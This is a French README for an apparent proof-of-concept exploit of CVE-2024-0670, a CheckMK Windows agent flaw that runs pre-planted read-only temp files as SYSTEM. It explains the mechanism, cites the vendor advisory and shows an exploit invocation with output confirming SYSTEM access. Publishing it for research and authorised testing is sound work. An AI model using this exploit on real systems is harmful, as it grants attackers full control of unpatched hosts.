
PoC pour CVE-2024-0670
Ce dépôt fournit un exploit de Preuve de concept (PoC) pour la vulnérabilité CVE-2024-0670, affectant l'agent CheckMK sur les systèmes Windows. La vulnérabilité se produit lorsque l'agent CheckMK crée et exécute des fichiers temporaires dans le répertoire C:\Windows\Temp. Un attaquant peut abuser de ce comportement en plaçant au préalable des fichiers malveillants dans ce répertoire avec une protection en écriture. Lorsque l'agent tente de créer un fichier temporaire qui existe déjà en lecture seule, il ne parvient pas à l'écraser mais exécute néanmoins le fichier existant avec les privilèges SYSTEM, permettant ainsi une élévation de privilèges.
Référence de l'avis : SEC Consult - Élévation locale de privilèges via des fichiers inscriptibles dans l'agent Checkmk
Ce projet est destiné uniquement à des fins éducatives, de recherche et de tests de sécurité autorisés.
N'utilisez pas ce code sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.
L'auteur n'est pas responsable de tout dommage ou usage abusif.
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system